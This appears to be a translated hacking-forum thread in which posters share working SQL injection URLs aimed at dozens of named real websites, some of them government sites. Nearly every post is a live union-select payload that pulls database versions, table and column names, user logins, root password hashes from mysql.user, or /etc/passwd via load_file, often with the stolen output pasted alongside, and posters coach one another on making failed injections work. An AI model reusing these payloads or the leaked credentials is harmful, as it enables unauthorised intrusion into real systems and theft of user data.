Code: http://www.concertseries.org/index.php?page=-1+union+select+0,1,2,3,4,version(),user(),7,8,9,10,11,12,13,15,17,18,19,20/*
___http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+16,1/*
All tables: Code: http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES/* All columns: Code: http://www.chip.ua/?page=poll&id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13+from+INFOrMATION_SCHEMA.COLUMNS/*
Pass: test.. didn't find the login.. I assume it's also test Code: http://www.northberwickuk.com/info.php?id=-1+union+select+0,password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27+from+user/*&catid=324&f=NorthBerwick&type=featured
Code: http://www.sbinstitute.com/news.php?id=-1+union+select+0,concat(user,char(58),password),user,3,4+from+mysql.user/* root:18846f503afd5707 Second root today ) Unfortunately, I couldn't crack the pass (
Code: http://www.reporterdiario.com.br/index.php=3fid=3d-33150'+union+select+1,user(),database(),version(),5,6,7,8,9,10,11/*
https://forum.antichat.ru/showpost.php?p=340659&postcount=1987 https://forum.antichat.ru/showpost.php?p=465643&postcount=3174 Nice, so we can post things 10 times each, I guess that turns out more effective (more rep, etc.)?
___http://kino.ukr.net/i/nw.php?t=nologo&f=&id=4897999+uNioN+seLect+concat(login,0x3a,passw),null,null,null,null+from+users+limit+6,1/*&mid=1345 the result is in the page source version() 5.0.18 user() [email protected] database() afisha
Code: http://www.tahuichi.com.bo/noticia.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*&idioma=Ingles [email protected]:5.0.27:dbtahuichi HTML: http://www.iglesia.org.bo/sitio/comisiones/comisionbase.php?id=9999+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7/* iglesia_iglesia@localhost:4.1.22-standard:iglesia_ceb
Mssql+gov MSSQL+GOV tms.apps.em.doe.gov Code: http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=@@version-- http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=(select+system_user)-- www.workforcekentucky.ky.gov Code: http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=@@version-- http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=(select+system_user)-- www3.fmc.gov Code: http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=-1'+or+1=@@version-- http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=123'+union+select+1,system_user,3,4-- whoever is interested, dig further...
Code: http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,COLUMN_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.COLUMNS/* Code: http://www.captains-club.ru/index.php?id=110%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.TABLES/* Code: http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,TABLE_NAME,3,4,5%20from%20INFORMATION_SCHEMA.TABLES/* Code: http://www.avvakul.ru/index.php?id=2&p=6&tid=60%20union%20select%201,COLUMN_NAME,3,4,5%20from%20INFORMATION_SCHEMA.COLUMNS/* Code: http://www.vipsoft.by/index.php?id=200%20union%20select%201,TABLE_NAME,3%20from%20INFORMATION_SCHEMA.TABLES/* Code: http://www.vipsoft.by/index.php?id=200%20union%20select%201,COLUMN_NAME,3%20from%20INFORMATION_SCHEMA.COLUMNS/*
An interesting SQLi. Code: http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,column_name),4+from+information_schema.columns/* Too bad I don't know how to get the info to output; every query to the DB returns this error: 1146 - Table 'webtelek_com.xxx_xxx' doesn't exist select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws (0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank [TEP STOP] Explain it to a lamer, whoever can be bothered. Thanks. [53X]Shadow Code: http://www.webtelek.com/includes/products_view.php?pid=-0+'union+select+1,2,concat_ws(0x3a,username,user_password,user_icq,user_email),4+from+phpbb.phpbb_users/*
You're using the wrong schema (database) for phpads_clients. First we find out the DB name like this: Code: http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,table_schema,4+from+information_schema.tables+where+table_name='phpads_clients'/* and then, using the dot, we query the required table: Code: http://www.webtelek.com/includes/products_view.php?pid=-0%20'union%20select%201,2,concat_ws(0x3a,clientname,clientpassword),4%20from%20[B]phpads.[/B]phpads_clients/* More details here: https://forum.antichat.ru/showpost.php?p=442627&postcount=26
[53x]Shadow, fobofob, you won't find anything interesting in the phpads_clients table. By default, the phpads_config table contains the admins' logins and MD5 password hashes, columns admin, admin_pw
Hm.. I basically wasn't looking for anything there, I just explained to the person where the mistake was, but basically phpads_config only has the admin's name and hash, while phpads_clients has a ton of different hashes =)
Code: http://www.groza.ru/index.php?m=servers&a=view&sid=-2+union+select+1,version(),3,4,5/*&id=0 Code: http://www.ceidot.com/adres.php?id=-11+union+select+1,user(),3/* Code: http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,5,6,7,8,1,1,1/*
Code: http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9,10,11/* /etc/passwd Code: http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,concat(user,char(58),password),9,10,11+from+mysql.user/* Yet another root ) root:3facb56d34db5a20
Outputting the user and pass: Code: http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+from+mysql.user/* yroot 31a457464200908a This is the first successful SQLi that I managed to use, and I understood how they work! Thanks to everyone for that!
Code: http://www.missiontech.co.nz/read_a_article.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database())/* toms@localhost:5.0.41:MT_ArticlesDB Code: http://www.gicom.co.mz/index.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/* gicomco@localhost:4.1.22-standard:gicomco_site Code: http://farm.avocadolite.com/member.phtml?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),7,8/* 4.1.16-standard-log Code: http://www.ollin.com.mx/news_esp.php?id=-1+union+select+1,2,3,4,concat(nombre,0x3a,password,0x3a,email),6,7,8+from+usuarios/* Joe:4050:[email protected] Code: http://www.a.com.mx/noticia.php?id=-1+union+select+1,user(),3,4,database(),6,7,8,version()/* Code: http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/* [email protected]:5.0.41--log:midiasemmascara http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+1,concat(login,0x3a,usuario)+from+db_admusers+limit+2,1/* Code: http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/* papst2007@localhost:4.0.24_Debian-10sarge2-log:visitapapa http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,user,password+from+mysql.user/* root:706ae7350f1aa0d5 Code: http://www.temporeal.com.br/produtos.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* [email protected]:4.0.21-standard-log:temporeal Code: http://www.araucodobrasil.com.br/page.php?id=-1+union+select+1,concat(name,0x3a,login,0x3a,password,0x3a,type)+from+aglomerado_users+limit+19000/* Code: http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7/*&tipo=episodio&origem=Assista 
http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(USER,0x71),0x71),6,7+from+mysql.user/*&tipo=episodio&origem=Assista http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/*&tipo=episodio&origem=Assista Code: http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13/* http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(column_name,0x3a,table_name),10,11,12,13+from+INFORMATION_SCHEMA.COLUMNS+limit+178,1/* Code: http://www.rockwm.de/songdetail.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),8,9,10,11,12/* Code: http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6/* [email protected]:5.0.22-Debian_0ubuntu6.06.2-log:intranet Code: http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/union/**/select/**/1,user,password,4,5,6+from+mysql.user+limit+1,2/* root:4cd8bb5521e9721c with limit up to 6,2 Code: http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/union/**/select/**/1,2,concat(column_name,0x3a,table_name,0x3a),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+159,1/*